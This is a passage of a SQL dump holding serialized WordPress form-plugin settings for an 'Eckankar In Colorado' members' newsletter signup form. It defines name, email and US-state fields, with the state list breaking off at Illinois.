0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(17,'a:7:{s:2:\"id\";i:17;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:250:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - MEMBERS Newsletter Signup</span></span></span></strong></span></h3>\nGet the latest news from around the state!\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1550094026658\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:18:\"html_1550094026658\";}s:2:\"id\";i:178;}i:1;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:9:\"firstname\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:23:\"firstname_1550094074971\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:23:\"firstname_1550094074971\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:179;}i:2;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:22:\"lastname_1550094079880\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:22:\"lastname_1550094079880\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:180;}i:3;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:19:\"email_1550094081455\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:19:\"email_1550094081455\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:181;}i:4;a:2:{s:8:\"settings\";a:17:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:9:\"liststate\";s:5:\"label\";s:9:\"US States\";s:3:\"key\";s:23:\"liststate_1550094094681\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"options\";a:55:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"- Select State -\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"8\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"9\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"10\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"11\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"12\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"13\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 